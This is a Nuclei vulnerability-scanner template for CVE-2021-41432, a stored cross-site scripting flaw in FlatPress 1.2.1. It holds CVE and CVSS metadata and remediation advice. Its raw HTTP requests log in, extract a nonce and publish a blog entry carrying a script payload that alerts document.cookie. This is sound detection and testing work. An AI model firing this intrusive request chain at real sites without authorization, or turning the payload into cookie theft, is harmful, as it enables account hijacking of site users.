id: CVE-2021-41432 info: name: FlatPress 1.2.1 - Stored Cross-Site Scripting author: arafatansari severity: medium description: | FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks. remediation: | Upgrade to the latest version of FlatPress (1.2.2) or apply the provided patch to fix the XSS vulnerability. reference: - https://github.com/flatpressblog/flatpress/issues/88 - https://nvd.nist.gov/vuln/detail/CVE-2021-41432 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-41432 cwe-id: CWE-79 epss-score: 0.00084 epss-percentile: 0.35072 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: flatpress product: flatpress shodan-query: http.html:"Flatpress" tags: cve,cve2021,flatpress,xss,authenticated,oss,intrusive http: - raw: - | POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="user" {{username}} ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="pass" {{password}} ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="submit" Login ------WebKitFormBoundarykGJmx9vKsePrMkVp-- - | GET /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} - | POST /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd×tamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish - | GET /index.php/2022/10 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true req-condition: true matchers: - type: dsl dsl: - contains(body_4, '
') - contains(body_4, 'FlatPress') - contains(header_4, 'text/html') - status_code_4 == 200 condition: and extractors: - type: regex name: nonce group: 1 regex: - name="_wpnonce" value="([0-9a-z]+)" /> internal: true part: body # digest: 4b0a00483046022100a40a87af5bba1dd06f4a5ef8464417e32e6e42c4d809a2e3ebe3e5c4f56ff811022100bb0a2e562b27666d530f2f2c8bf5f6823a270129c34ab310da692c87f1f93006:922c64590222798bb761d5b6d8e72950